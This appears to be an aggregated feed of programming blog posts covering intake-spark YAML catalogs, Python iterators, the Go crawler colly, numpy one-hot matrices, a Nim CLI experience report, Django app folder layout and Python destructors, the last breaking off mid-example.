Encoding a Spark function for use with Intake is slightly involved, but not too difficult once one is familiar with it. The following cell encodes sc.textFile('cat.yaml').map(str.split).map(len) , where sc is the SparkContext. This style is typical in working with Spark, and in the Intake version, each stage of attribute look-up becomes an element in a list, with the attribute name (a string) and any other parameters (a list, each time).

The file in question is created a few cells down, if you don’t already have it.

In[2]:

source = intake.open_spark_rdd([
    ['textFile', ['cat.yaml']],
    ['map', [str.split]],
    ['map', [len]]
], {})

Calling to_spark() on this grabs the Spark reference to the RDD. Note that we are setting up the SparkContext automatically, and it will get a local cluster with as many workers as CPU cores. The last argument, {} , can be used to specify how the context is set up.
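To make the list-of-stages encoding more concrete, here is a plain-Python sketch of how such a list could be replayed as a chain of attribute look-ups and calls. This is not intake-spark's implementation; the helper apply_chain and the string example are invented for illustration, and no Spark installation is needed to run it.

```python
def apply_chain(start, steps):
    """Replay [attribute_name, [args...]] stages against a starting object."""
    obj = start
    for name, params in steps:
        # Look up the attribute by name, then call it with the listed parameters.
        obj = getattr(obj, name)(*params)
    return obj


# Equivalent to ' a,b,c '.strip().split(',').index('b')
steps = [
    ['strip', []],
    ['split', [',']],
    ['index', ['b']],
]
result = apply_chain(' a,b,c ', steps)
print(result)
```

With a SparkContext as the starting object, the same pattern would correspond to the sc.textFile(...).map(...).map(...) chain described above.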

In[3]:

rdd = source.to_spark()
rdd

Out[3]: PythonRDD[2] at RDD at PythonRDD.scala:53

To complete the word count, we can call sum() . We check the result by calling the command-line utility wc .

In[4]:

rdd.sum()

Out[4]:

Note that the read() and read_partition() methods work as expected, providing normal python methods.

In[5]:

source.read()

Out[5]: [1, 1, 1, 1, 3, 3, 3, 3, 3, 2, 3, 4, 2, 7, 2, 2]

In[6]:

sum(source.read())

Out[6]:

In[7]:

!wc -w cat.yaml

41 cat.yaml

As usual, we can get the equivalent YAML for this source and put it in a file to make a catalog. Note how python functions are expressed and the nesting of lists. It is more typical to have single-stage spark chains and leave the manipulation of the RDDs to user code.

In[8]:

print(source.yaml())

sources:
  spark_rdd:
    args:
      args:
      - - textFile
        - - cat.yaml
      - - map
        - - !!python/object/apply:builtins.getattr
            - !!python/name:builtins.str ''
            - split
      - - map
        - - !!python/name:builtins.len ''
      context_kwargs: {}
    description: ''
    driver: spark_rdd
    metadata: {}

In[9]:

%%writefile cat.yaml
sources:
  example_rdd:
    args:
      args:
      - - textFile
        - - cat.yaml
      - - map
        - - !!python/object/apply:builtins.getattr
            - !!python/name:builtins.str ''
            - split
      - - map
        - - !!python/name:builtins.len ''
      context_kwargs: {}
    description: 'Gets number of words per line'
    driver: spark_rdd
    metadata: {}

Overwriting cat.yaml

In[10]:

# we get the same result from the catalog
cat = intake.open_catalog('cat.yaml')
cat.example_rdd.to_spark().sum()

Out[10]:

The same operation can be done with the spark_dataframe driver, except that the starting point of the attribute lookups will be a SparkSession, as opposed to a SparkContext, and to_spark() will output a Spark DataFrame. The data-frame variant is able to introspect to determine the data types of the columns before loading any data.

Making a Context and Session

The previous example used the default Spark context, local[*] , because the argument to context_kwargs was an empty dictionary. In general, intake-spark will make use of any context/session that already exists. It is best to create contexts/sessions ahead of time, in the standard way of creating them for your system. You can be certain that intake-spark will pick them up by explicitly setting them as follows:

In[]:

from intake_spark.base import SparkHolder
SparkHolder.set_class_session(sc=sc, session=session)

Additionally, you can include a set of arguments, e.g. master= , app_name= , hive=True , that intake-spark will use to create the session for you. These arguments can also be encoded into catalogs under the keyword context_kwargs .

In[]:

SparkHolder.set_class_session(master='spark://my.server:7077', ...)

Existing drivers

As an experimental feature, certain drivers in the Intake ecosystem will also support the .to_spark() method, which will produce the equivalent Spark instance for the data type of the original source. First set up the session using the methods above; otherwise the default cluster will be assumed, which may well be the local cluster.

In these cases, most python-specific arguments are simply ignored, and only the URL is passed to Spark. When accessing remote data services, Spark must be already correctly configured to give you access.

The drivers currently supported

↧

Some notes on iterables and iterators in Python

December 7, 2018, 12:34 pm


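Many Python tutorials explain this topic in ways that are hard to follow. This article records my own understanding and experience; it is a first look at iterators and generators.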

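I. About iteration

Given a list, a tuple, a dictionary or even a string, walking through it with for is called iteration.

1. Iterating over a list

list1 = ['haha', 'xixi', 'hehe']
for x in list1:
    print(x)

2. Use enumerate when you also need the index while iterating over a list

list1 = ['haha', 'xixi', 'hehe']
for index, value in enumerate(list1):
    print(index, value)

3. Tuples and strings are iterated the same way as lists, and enumerate works on them too

4. Iterating over a dictionary, method one (iterates over the keys)

dict1 = {'name': 'Zhang San', 'age': 20, 'gender': 'male'}
for item in dict1:
    print(item)

5. Iterating over a dictionary, method two

dict1 = {'name': 'Zhang San', 'age': 20, 'gender': 'male'}
for key in dict1.keys():
    print(key)

6. Iterating over a dictionary, method three

dict1 = {'name': 'Zhang San', 'age': 20, 'gender': 'male'}
for value in dict1.values():
    print(value)

7. Iterating over a dictionary, method four

dict1 = {'name': 'Zhang San', 'age': 20, 'gender': 'male'}
for k, v in dict1.items():
    print(k, v)

II. The difference between iterables and iterators

1. An iterable can generally be traversed with for

2. An iterator can be traversed with for and can also hand out one element at a time through the next() function

3. To turn an iterable into an iterator, use iter(iterable)

4. How to tell iterables and iterators apart

from collections.abc import Iterator, Iterable

# Iterable represents an iterable object
# Iterator represents an iterator
list1 = [1, 2, 3]
print(isinstance(list1, Iterator))        # False
print(isinstance(list1, Iterable))        # True
print(isinstance(iter(list1), Iterator))  # True

5. Collection types such as list , dict and str are Iterable but not Iterator ; however, the iter() function returns an Iterator object for them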
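To make points 2 and 3 above concrete, the sketch below obtains an iterator with iter() and consumes it with next(). The variable names are illustrative.

```python
from collections.abc import Iterable, Iterator

list1 = [1, 2, 3]
it = iter(list1)            # the list is iterable; iter() returns an iterator over it

first = next(it)            # take one element at a time
rest = list(it)             # consume whatever is left
exhausted = next(it, None)  # a default value avoids StopIteration once the iterator is empty

print(first, rest, exhausted)
print(isinstance(list1, Iterator), isinstance(it, Iterator))
```

An iterator remembers its position and can only be consumed once, whereas calling iter(list1) again returns a fresh iterator that starts from the beginning.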

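III. Implementing your own iterable object

1. Method one (implement the __getitem__ magic method in the class)

from collections.abc import Iterator, Iterable


class Company(object):
    def __init__(self, employee_list):
        self.employee = employee_list

    def __getitem__(self, item):
        return self.employee[item]


if __name__ == "__main__":
    company = Company(['Zhang San', 'Li Si', 'Wang Wu'])
    # False: the Iterable check only looks for __iter__, not __getitem__
    print(isinstance(company, Iterable))
    print(isinstance(company, Iterator))        # False
    print(isinstance(iter(company), Iterator))  # True
    # for still works, because iter() falls back to __getitem__
    for item in company:
        print(item)

2. Method two (implement the __iter__ magic method together with the __next__ magic method); the object is then already an iterator

from collections.abc import Iterator, Iterable


class Company(object):
    def __init__(self, employee_list):
        self.employee = employee_list
        self.index = 0

    def __iter__(self):
        return self

    def __next__(self):
        try:
            current_val = self.employee[self.index]
        except IndexError:
            raise StopIteration
        self.index += 1
        return current_val


if __name__ == "__main__":
    company = Company(['Zhang San', 'Li Si', 'Wang Wu'])
    print(isinstance(company, Iterable))  # True
    print(isinstance(company, Iterator))  # True
    # index is never reset, so a second loop over company yields nothing
    for item in company:
        print(item)

3. Summary

1. The built-in iter function calls the __iter__ magic method; if there is no __iter__ , it falls back to the __getitem__ magic method
2. isinstance(company, Iterable) checks whether an object is iterable; it only looks for __iter__ , so it returns False for a class that implements only __getitem__ , even though for and iter() work on it
3. isinstance(company, Iterator) checks whether an object is an iterator
4. An iterable object is not necessarily an iterator, but the iter() function turns an iterable into an iterator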
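A common third variant, shown here as a sketch and not as something from the original article, keeps the iterable and the iterator separate by writing __iter__ as a generator. Each for loop then gets a fresh iterator, so the object can be traversed more than once. The class reuses the Company name purely for continuity.

```python
from collections.abc import Iterable, Iterator


class Company:
    def __init__(self, employee_list):
        self.employee = list(employee_list)

    def __iter__(self):
        # A generator function: every call returns a new, independent iterator.
        for name in self.employee:
            yield name


company = Company(['Zhang San', 'Li Si', 'Wang Wu'])
first_pass = list(company)
second_pass = list(company)    # works again, because no position is stored on the object

print(first_pass == second_pass)
print(isinstance(company, Iterable), isinstance(company, Iterator))
```

Here Company is an Iterable but not an Iterator; the generator object returned by __iter__ plays the iterator role.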

↧

Still writing crawlers in Python? Try this Go crawler framework

December 7, 2018, 12:32 pm


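Today's introduction is to a crawler framework written in Go: colly .

Getting started

First, install colly with the following command.

go get -u github.com/gocolly/colly/...

Next, build a Collector , add event handlers, and start visiting:

package main

import (
	"fmt"

	"github.com/gocolly/colly"
)

func main() {
	// Initialize colly
	c := colly.NewCollector(
		// Only collect content under the allowed domains
		colly.AllowedDomains("hackerspaces.org", "wiki.hackerspaces.org"),
	)

	// Every a element with an href attribute triggers the callback.
	// The first argument is a jQuery-style selector.
	c.OnHTML("a[href]", func(e *colly.HTMLElement) {
		link := e.Attr("href")
		fmt.Printf("Link found: %q -> %s\n", e.Text, link)
		// Visit the link
		c.Visit(e.Request.AbsoluteURL(link))
	})

	// Print the URL before each request is sent
	c.OnRequest(func(r *colly.Request) {
		fmt.Println("Visiting", r.URL.String())
	})

	// Start crawling from this address
	c.Visit("https://hackerspaces.org/")
}

Running the code above starts from the initial address and recursively collects every page under the two allowed domains. See how simple and convenient that is!

Login and authentication

Some pages on some sites can only be accessed when logged in. Colly provides a Post method for login requests ( colly maintains cookies itself).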

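// authenticate
err := c.Post("http://example.com/login", map[string]string{"username": "admin", "password": "admin"})
if err != nil {
	log.Fatal(err)
}

Many sites use captchas, csrf_token and similar anti-attack measures. A csrf_token is usually found somewhere in the page, for example in a form or in a meta tag, and is easy to extract. For captchas, you can try entering the answer in the console or use image recognition.

Rate limiting

Many content sites have anti-scraping measures, so requesting too fast may well get your IP banned. You can use LimitRule to limit the crawl speed.

// For any domain, allow only two concurrent requests to that domain
c.Limit(&colly.LimitRule{DomainGlob: "*", Parallelism: 2})

The above is a simple example. Besides limiting concurrency per domain, you can also limit the delay between requests and more. Here is the LimitRule struct:

type LimitRule struct {
	// Regular expression that matches domains
	DomainRegexp string
	// Glob pattern that matches domains
	DomainGlob string
	// Time to wait before starting a new request
	Delay time.Duration
	// Extra random wait before starting a new request
	RandomDelay time.Duration
	// Number of concurrent requests allowed for the matching domains
	Parallelism int
	waitChan chan bool
	compiledRegexp *regexp.Regexp
	compiledGlob glob.Glob
}

Queues and redis storage support

In some cases the crawler may stop, whether we kill it or it crashes, so saving progress sensibly helps us skip content that has already been crawled. This is where queues and storage support come in.

Colly has a file storage mode of its own, which is disabled by default. Using redis for storage is recommended.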

urls := []string{
	"http://httpbin.org/",
	"http://httpbin.org/ip",
	"http://httpbin.org/cookies/set?a=b&c=d",
	"http://httpbin.org/cookies",
}

c := colly.NewCollector()

// Create the redis storage
storage := &redisstorage.Storage{
	Address:  "127.0.0.1:6379",
	Password: "",
	DB:       0,
	Prefix:   "httpbin_test",
}

// Attach the storage to the collector
err := c.SetStorage(storage)
if err != nil {
	panic(err)
}

// Delete previous data (if needed)
if err := storage.Clear(); err != nil {
	log.Fatal(err)
}

// Close the redis connection when finished
defer storage.Client.Close()

// Create a request queue backed by redis,
// with the number of consumers set to 2
q, _ := queue.New(2, storage)

c.OnResponse(func(r *colly.Response) {
	log.Println("Cookies:", c.Cookies(r.Request.URL.String()))
})

// Add the URLs to the queue
for _, u := range urls {
	q.AddURL(u)
}

// Start crawling
q.Run(c)

When using a queue, links found while parsing a page can be added to the queue as further URLs.

Parsing content

Once the content is fetched, how do we parse it and extract what we want?

Taking HTML as an example ( colly can also parse XML and other content):

// refentry content
c.OnHTML(".refentry", func(element *colly.HTMLElement) {
	// ...
})

The first argument of OnHTML is a jQuery-style selector and the second is a callback, which receives an HTMLElement object. The HTMLElement struct:

type HTMLElement struct {
	// Name of the tag
	Name string
	Text string
	attributes []html.Attribute
	// The current request
	Request *Request
	// The current response
	Response *Response
	// DOM element of the current node
	DOM *goquery.Selection
	// Index of this element within the callback
	Index int
}

The DOM field lets you manipulate nodes (add and remove them), traverse them and read their content.

The DOM field is of type Selection , which provides a large number of methods. If you have used jQuery , it will feel familiar.

For example, suppose we want to remove the h1.refname tag and return the HTML content of the parent element:

c.OnHTML(".refentry", func(element *colly.HTMLElement) {
	titleDom := element.DOM.Find("h1.refname")
	title := titleDom.Text()
	titleDom.Remove()
	content, _ := element.DOM.Html()
	// ...
})

Other features

Beyond this, Colly has other powerful features, such as a maximum recursion depth, URL filtering, URL revisiting (by default each URL is visited only once) and encoding detection. All of these are covered in the official documentation or can be found in the colly source code.

The colly documentation is at: http://go-colly.org/docs/intr...

↧

Unique random matrix in numpy

December 7, 2018, 3:10 pm


I want to make a matrix x with shape (n_samples, n_classes) where each x[i] is a random one-hot vector. Here's a slow implementation:

x = np.zeros((n_samples, n_classes))
J = np.random.choice(n_classes, n_samples)
for i, j in enumerate(J):
    x[i, j] = 1

What's a more pythonic way to do this?

Create an identity matrix using np.eye :

x = np.eye(n_classes)

Then use np.random.choice to select rows at random:

x[np.random.choice(x.shape[0], size=n_samples)]

As a shorthand, just use:

np.eye(n_classes)[np.random.choice(n_classes, n_samples)]

Demo:

In [90]: np.eye(5)[np.random.choice(5, 100)]
Out[90]:
array([[ 1., 0., 0., 0., 0.],
       [ 1., 0., 0., 0., 0.],
       [ 0., 0., 1., 0., 0.],
       [ 0., 0., 0., 0., 1.],
       [ 0., 0., 0., 1., 0.],
       [ 1., 0., 0., 0., 0.],
       [ 0., 0., 0., 1., 0.],
       ....
(... to 100)
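The shorthand can be wrapped in a small function and sanity-checked. This is only a sketch: the function name random_one_hot and the seed parameter are not from the answer, and it uses NumPy's Generator API (np.random.default_rng) instead of np.random.choice so that the result is reproducible.

```python
import numpy as np


def random_one_hot(n_samples, n_classes, seed=None):
    """Return an (n_samples, n_classes) array whose rows are random one-hot vectors."""
    rng = np.random.default_rng(seed)  # seeded generator (an addition, for reproducibility)
    labels = rng.integers(0, n_classes, size=n_samples)  # one class index per row
    # Row k of the identity matrix is the one-hot vector for class k,
    # so indexing with the labels picks one such row per sample.
    return np.eye(n_classes)[labels]


x = random_one_hot(n_samples=6, n_classes=4, seed=0)
print(x.shape)        # (6, 4)
print(x.sum(axis=1))  # every row sums to 1
```

The indexing step builds the whole result in one vectorized operation, which is what removes the Python-level loop from the slow version.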

↧

Nim: The good, the OK, and the hard

December 7, 2018, 4:40 pm


Background

I’m a software engineer at ThreeFoldTech and the author of Nim Days.

One of the projects we develop at ThreeFoldTech is Zero-OS, a stateless Linux operating system designed for clustered deployments to host virtual machines and containerized applications. We wanted a CLI (like docker) to manage the containers and communicate with zero-os instead of using the Python client.

Application requirements

- single binary
- zos should be like docker for dockerd
- commands to interact with zero-os (via redis)
- subcommands to interact with containers on zero-os
- documentation (soft documentation, hard documentation)
- tabular output for humans (listing containers and such)
- support json output when needed too (for further manipulation by tools like jq)

Sounds simple enough. Any language would do just fine.

Choosing Nim

From the Nim website:

Nim is a systems and applications programming language. Statically typed and compiled, it provides unparalleled performance in an elegant package.

- High-performance garbage-collected language
- Compiles to C, C++ or JavaScript
- Produces dependency-free binaries
- Runs on Windows, macOS, Linux, and more

In the upcoming sections, I’ll talk about the good, the okay, and the hard points I faced while developing this simple CLI application with the requirements above.

The good

Static typing

Nim eliminates a whole class of errors by being statically typed.

Expressiveness

Nim is like Python (a whitespace-sensitive language), and there’s even a guide on the official repo, Nim for Python programmers. Seeing some Pascal concepts in Nim makes me very nostalgic too.

import strutils, strformat, os, ospaths, osproc, tables, parsecfg, json, marshal, logging
import net, asyncdispatch, asyncnet, streams, threadpool, uri
import logging
import algorithm
import base64
import redisclient, redisparser
import asciitables
import docopt

proc checkContainerExists*(this:App, containerid:int): bool=
  ## checks if container `containerid` exists or not
  try:
    discard this.containerInfo(containerid)
    result = true
  except:
    result = false

I find UFCS (Uniform Function Call Syntax) really great too (see the excellent nim basics).

proc plus(x, y: int): int = # <1>
  return x + y

proc multi(x, y: int): int =
  return x * y

let
  a = 2
  b = 3
  c = 4

echo a.plus(b) == plus(a, b)
echo c.multi(a) == multi(c, a)
echo a.plus(b).multi(c) # <2>
echo c.multi(b).plus(a) # <3>

Also, case insensitivity is pretty neat: toUpper, toupper and to_upper all name the same thing.

I don’t use the same identifier with different cases in the same scope.

type ContainerInfo* = object of RootObj
  id*: string
  cpu*: float
  root*: string
  hostname*: string
  name*: string
  storage*: string
  pid*: int
  ports*: string

I like the way types and enums are defined, and the access control: * means public.

Developing sync, async in the same interface

Pragmas are Nim’s method to give the compiler additional information/commands without introducing a massive number of new keywords. Pragmas are processed on the fly during semantic checking. Pragmas are enclosed in the special {. and .} curly brackets. Pragmas are also often used as a first implementation to play with a language feature before a nicer syntax to access the feature becomes available.

I’m a fan of the multisync pragma because it lets you define procs for both async and sync code easily.

proc readMany(this:Redis|AsyncRedis, count:int=1): Future[string] {.multisync.} =
  if count == 0:
    return ""
  let data = await this.receiveManaged(count)
  return data

Basically, for sync execution multisync will remove Future and await from the definition, and for async execution it will leave them in place.

The tooling

vscode-nim

vscode-nim is my daily driver. It works as expected, but sometimes it consumes a lot of memory. There’s also LSP support in the works.

nimble

Everything you expect from a package manager: creating projects, managing dependencies and publishing (too coupled with GitHub, but that’s fine with me).

The OK

These are the OK parts that can be improved in my opinion

Documentation

There’s a great community effort to provide documentation . I hope we get more and more soft documentation and better quality on the official docs too.

Weird symbols / json

Nim chooses unreadable symbols like %* and $$ over clear names like dumps or loads.

Error Messages

Sometimes the error messages aren’t good enough. For instance, I got i is not accessible and even with using writeStackTrace I couldn’t get anything useful. So I grepped the codebase where accessible comes from and continued from there.

Another example was this:

timeddoutable.nim(44, 16) template/generic instantiation from here
timeddoutable.nim(34, 6) Error: type mismatch: got <Thread[ptr Channel[system.bool]], proc (cancelChan: ptr Channel[system.bool]):bool{.gcsafe, locks: 0.}, ptr Channel[system.bool]>
but expected one of:
proc createThread[TArg](t: var Thread[TArg]; tp: proc (arg: TArg) {.thread, nimcall.}; param: TArg)
  first type mismatch at position: 2
  required type: proc (arg: TArg){.gcsafe.}
  but expression 'p' is of type: proc (cancelChan: ptr Channel[system.bool]): bool{.gcsafe, locks: 0.}
proc createThread(t: var Thread[void]; tp: proc () {.thread, nimcall.})
  first type mismatch at position: 1
  required type: var Thread[system.void]
  but expression 't' is of type: Thread[ptr Channel[system.bool]]

expression: createThread(t, p, addr(cancelChan))

While the error is clear, I just had a hard time reading it.

The Hard

I seriously considered (multiple times) switching to a language with a more mature ecosystem because of these points.

Static linking

Nim promises that it "Produces dependency-free binaries", as stated on its website, but getting a statically linked binary is a hard and undocumented process, even though it was one of the cases I hoped to use Nim for.

I managed to statically link with PCRE and SSL with lots of help from the community.

Dynamic linking

Building on Mac OSX with SSL is no fun, especially when your SSL isn’t 1.1. (I managed to do it with lots of help from the community.)

brew install openssl@1.1
nim c -d:ssl --dynlibOverride:ssl --dynlibOverride:crypto --threads:on --passC:'-I/usr/local/opt/openssl\@1.1/include/' --passL:'-lssl -lcrypto -lpcre' --passL:'-L/usr/local/opt/openssl\@1.1/lib/' src/zos.nim

Developing a redisclient

We have a redis protocol keyvalue store 0-db that I needed to work against a while ago, and I found a major problem with the implementation of the parser and the client in the official nim redis library. So I had to roll my own parser / client

Developing asciitable library

To show a table listing all of the containers (id, name, open ports and image it’s running from) I needed an ascii table library in Nim (I found 0 libraries). I had to write my own nim-asciitables

Nim-JWT

In the transport layer, we send a JWT token to request extra privileges on zero-os, and for that I needed JWT support. Again, JWT libraries are far from complete in Nim, and I had to try to fix one to add ES384 support. With that fix I was able to get the claims, but I couldn’t really verify the token with the public key :( So I decided not to do client-side validation and to leave the validation to zero-os (the backend).

Concurrency and communication

In some parts of the application we want to add the ability to time out after some period of time. Nim supports multithreading using threadpool and an async/await combo, and has HTTPBeast, so that shouldn’t be a problem.

When I saw Channels and spawn I thought it’d be as easy as goroutines in Go or fibers in Crystal.

So this was my first try with spawn:

import os, threadpool

var cancelChan: Channel[bool]
cancelChan.open()

proc p1():bool=
  result = true
  for i in countup(0,50):
    echo "p1 Doing action"
    sleep(1000)
    let (hasData, msg) = cancelChan.tryRecv()
    if msg == true:
      echo "Cancelling p1"
      return
  echo "Done p1..."

proc p2(): bool =
  result = true
  for i in countup(0,5):
    echo "p2 Doing action"
    sleep(1000)
    let (hasData, msg) = cancelChan.tryRecv()
    if msg == true:
      echo "Cancelling p2"
      return
  echo "Done p2"

proc timeoutable(p:proc, timeout=10)=
  var t = (spawn p())
  for i in countup(0, timeout):
    if t.isReady():
      return
    sleep(1000)
  cancelChan.send(true)

when isMainModule:
  timeoutable(p1)
  timeoutable(p2)

However, the Nim creator Andreas Rumpf said using spawn with channels is a bad idea and that channels are meant to be used with threads, so I tried to move it to threads:

import os, threadpool

type Args = tuple[cancelChan:ptr Channel[bool], respChan: ptr Channel[bool]]

proc p1(a: Args): void {.thread.}=
  var cancelChan = a.cancelChan[]
  var respChan = a.respChan[]
  for i in countup(0,50):
    let (hasData, msg) = cancelChan.tryRecv()
    echo "p1 HASDATA: " & $hasData
    echo "p1 MSG: " & $msg
    if hasData == true:
      echo "Cancelling p1"
      respChan.send(false)
      return
    echo "p1 Doing action"
    sleep(1000)
  echo "Done p1..."
  respChan.send(true)

proc p2(a: Args): void {.thread.}=
  var cancelChan = a.cancelChan[]
  var respChan = a.respChan[]
  for i in countup(0,5):
    let (hasData, msg) = cancelChan.tryRecv()
    echo "p2 HASDATA: " & $hasData
    echo "p2 MSG: " & $msg
    if hasData:
      echo "proc cancelled successfully"
      respChan.send(false)
      return
    echo "p2 Doing action"
    sleep(1000)
  echo "Done p2..."
  respChan.send(true)

proc timeoutable(p:proc, timeout=10): bool=
  var cancelChan: Channel[bool]
  var respChan: Channel[bool]
  var t: Thread[Args]
  cancelChan.open()
  respChan.open()
  var args = (cancelChan.addr, respChan.addr)
  createThread[Args](t, p, (args))
  for i in countup(0, timeout):
    let (hasData, msg) = respChan.tryRecv()
    if hasData:
      return msg
    sleep(1000)
  echo "Cancelling proc.."
  cancelChan.send(true)
  close(cancelChan)
  close(respChan)
  return false

when isMainModule:
  echo "P1: " & $timeoutable(p1)
  echo "P2: " & $timeoutable(p2)

I’m not a fan of all this pointer passing, casting and .addr.
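For comparison only, here is how the same cancel-on-timeout pattern (a worker that polls a cancel signal and reports back on a response channel) might look in Python. This is a sketch, not a translation of the zos code: the names worker and timeoutable, the step_seconds parameter and the use of threading.Event plus queue.Queue in place of the two Nim channels are all choices made for this illustration.

```python
import queue
import threading
import time


def worker(steps, cancel, result, step_seconds=0.01):
    """Do `steps` units of work, checking for cancellation between units."""
    for _ in range(steps):
        if cancel.is_set():        # cooperative cancellation point
            result.put(False)
            return
        time.sleep(step_seconds)   # stand-in for real work
    result.put(True)


def timeoutable(steps, timeout_seconds):
    """Run worker in a thread; return True if it finished before the timeout."""
    cancel = threading.Event()     # plays the role of cancelChan
    result = queue.Queue()         # plays the role of respChan
    t = threading.Thread(target=worker, args=(steps, cancel, result))
    t.start()
    try:
        return result.get(timeout=timeout_seconds)
    except queue.Empty:
        cancel.set()               # ask the worker to stop
        t.join()
        return False


print(timeoutable(steps=3, timeout_seconds=1.0))      # True
print(timeoutable(steps=1000, timeout_seconds=0.05))  # False
```

As in the Nim version, cancellation is cooperative: the worker only stops at the points where it checks the signal.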

Macros

Macros allow you to apply transformations to the AST at compile time, which is really amazing, but they can be very challenging to follow or even work with, especially when they’re not well documented. I feel they’re kind of abused in the language, resulting in half-baked libraries and a macro playground.

Conclusion

Overall, Nim is a language with great potential, and its small team is doing an excellent job. Just be prepared to write lots of missing libraries if you want to use it in production. It’s a great chance to reinvent the wheel with no one blaming you :)

↧

Django project, apps structure and folders

December 7, 2018, 7:50 pm


In this blog post I’ll talk about Django’s folder structure inside a project.

After developing a few projects with Django 1.11 and Django 2.0, I’ve run into an issue that’s been bothering me. When you create projects and apps in Django as the tutorial shows, apps are created inside the main project folder, at the same level as the project’s settings folder (usually the folder that has the same name as your project).

So basically, what you end up with is a container folder that holds the project config folder plus one folder per app.

As a result, the folder ordering is different in every new project, because folders are usually sorted by name in your IDE (PyCharm, for example).

So, for instance, if your app is called ‘apples’ and your project is called ‘mysite’, then the order will be:

- apples
- mysite

Let’s also assume you’re using docker, so you probably have a docker folder, now we have:

- apples
- docker
- mysite

But if you create an app called ‘oranges’, now your project folder is:

- apples
- docker
- mysite
- oranges

This is uncomfortable because you never know which folder is the project’s config folder and which ones are app folders, so you keep opening the wrong folders all the time!! This is awful; as programmers, we tend to strive for efficiency!!

So my strategy for now is to bundle all apps inside an apps folder, so my project will always look like:

- apps
- docker
- mysite

And there you have it, nicely ordered apps inside your project!!

To include them in your settings, you just have to remember to include the namespace, 'apps.your_app_name'. So if your app is called apples:

INSTALLED_APPS += ['apps.apples']

Also, when importing classes in other files, just use the namespace. So if I need to import the Apple class defined in the models of my apples app, I would do something like this:

from apps.apples.models import Apple
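The reason the dotted path works is plain Python packaging: apps is a package (it has an __init__.py) sitting next to manage.py, so apps.apples.models is an ordinary module path. The sketch below reproduces that layout in a temporary folder without Django; the plain Apple class stands in for a real model, and the temporary directory is an assumption made so the example is self-contained.

```python
import importlib
import sys
import tempfile
from pathlib import Path

# Build a throwaway project layout: <tmp>/apps/apples/models.py
project_root = Path(tempfile.mkdtemp())
apples_dir = project_root / "apps" / "apples"
apples_dir.mkdir(parents=True)
(project_root / "apps" / "__init__.py").touch()   # makes `apps` a package
(apples_dir / "__init__.py").touch()
# A plain class stands in for a real Django model here.
(apples_dir / "models.py").write_text("class Apple:\n    pass\n")

# manage.py runs with the project root on sys.path; emulate that.
sys.path.insert(0, str(project_root))
importlib.invalidate_caches()

from apps.apples.models import Apple

print(Apple.__module__)  # apps.apples.models
```

Depending on the Django version, the name attribute in the generated apps/apples/apps.py may also need to be the full dotted path ('apps.apples') for the app to load.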

If you’ve read this far, it means you REALLY CARE about your project folder structure, so here’s a handy script I’ve created to start apps. It’s just a wrapper around the django startapp command, but it takes care of the apps folder, etc.

#!/usr/bin/env bash
if [ "$1" == "-h" ]; then
    echo "This script will create an app inside the apps folder"
    echo "To use type the following line:"
    echo "bash start-app.sh app_name"
    echo "Replace app_name with the actual name for your app"
elif [ "$1" != "" ]; then
    # Create the apps package the first time the script is used
    if [ ! -d "apps" ]; then
        mkdir apps
        touch apps/__init__.py
    fi
    mkdir "apps/$1"
    # /.dockerenv exists inside a container: run directly there,
    # otherwise go through docker-compose
    if [ -f /.dockerenv ]; then
        python manage.py startapp "$1" "apps/$1"
    else
        docker-compose run django python manage.py startapp "$1" "apps/$1"
    fi
    echo "Success! The app $1 has been added, don't forget to add INSTALLED_APPS += ['apps.$1'] in your project's settings.py"
else
    echo "Error! One parameter is expected: app_name"
fi

I call the file “start-app.sh”, so to use it just type

bash start-app.sh app_name

Happy coding!!

Also published on Medium .

↧

[Translation] Safely using destructors in Python

December 7, 2018, 7:48 pm


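Author: Eli Bendersky

This article applies to Python 2.5 and 2.6. If you see any difference in Python 3, please let me know.

Destructors are a very important concept in C++, where they are an essential ingredient of RAII (resource acquisition is initialization), which is virtually the only safe way to write code that allocates and releases resources in a program that throws exceptions.

In Python, destructors are needed much less, because Python has a garbage collector that takes care of memory management. However, while memory is the most commonly allocated resource, it is not the only one. There are also sockets and database connections to close, files, buffers and caches to flush, and a few more kinds of resources that need to be released when an object is done with them.

So Python has the destructor concept: the __del__ method. For some reason, many in the Python community believe that __del__ is evil and shouldn't be used. However, a simple grep of the standard library shows dozens of uses of __del__ in classes we all use and like, so where's the catch? In this article I'll try to make clear (first and foremost for myself) when __del__ should be used, and how.

Simple code samples

First a basic example:

class FooType(object):
    def __init__(self, id):
        self.id = id
        print self.id, 'born'

    def __del__(self):
        print self.id, 'died'

ft = FooType(1)

This prints:

1 born
1 died

Now, recall that because it uses a reference-counting garbage collector, Python won't clean up an object when it goes out of scope. It cleans it up when the last reference to it has gone out of scope. Here's a demonstration:

class FooType(object):
    def __init__(self, id):
        self.id = id
        print self.id, 'born'

    def __del__(self):
        print self.id, 'died'

def make_foo():
    print 'Making...'
    ft = FooType(1)
    print 'Returning...'
    return ft

print 'Calling...'
ft = make_foo()
print 'End...'

This prints:

Calling...
Making...
1 born
Returning...
End...
1 died

The destructor was called when the program ended, not when ft went out of scope in make_foo.

Alternatives to the destructor

Before I proceed, a proper disclosure: for managing resources, Python provides a better method than destructors, namely contexts. I won't turn this into a tutorial on contexts, but you should be familiar with the with statement and the objects that can be used inside it. For example, the best way to handle writing to a file is:

with open('out.txt', 'w') as of:
    of.write('222')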

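This makes sure the file is properly closed when the block inside the with exits, even if an exception is thrown. Note that this demonstrates a standard context manager. Another is threading.Lock, which returns a context manager very suitable for use in a with statement. For more details, read PEP 343.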
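To make the guarantee concrete, here is a minimal sketch of a hand-written context manager in Python 3 syntax. The ManagedResource class and the log list are hypothetical and exist only for this illustration; the point is that __exit__ runs even though the body of the with block raises.

```python
class ManagedResource:
    """Hypothetical resource that records what happens to it."""

    def __init__(self, name, log):
        self.name = name
        self.log = log

    def __enter__(self):
        self.log.append(self.name + " opened")
        return self

    def __exit__(self, exc_type, exc_value, traceback):
        # Runs on normal exit and also when the block raises.
        self.log.append(self.name + " closed")
        return False  # do not swallow the exception


log = []
try:
    with ManagedResource("db", log) as res:
        log.append("using " + res.name)
        raise RuntimeError("something went wrong")
except RuntimeError:
    log.append("error handled")

print(log)
# ['db opened', 'using db', 'db closed', 'error handled']
```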

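While recommended, with isn't always applicable. For example, suppose you have an object that encapsulates some sort of database, which has to be committed and closed when the object's life ends. Now suppose the object should be a member variable of some large and complex class (say, a GUI dialog, or an MVC model class). The parent interacts with the DB object from time to time in different methods, so using with isn't practical. What's needed is a functioning destructor.

Where destructors go astray

To solve the use case I presented in the previous paragraph, you can employ the __del__ destructor. However, it's important to know that this doesn't always work well. The nemesis of a reference-counting garbage collector is circular references. Here's an example:

class FooType(object):
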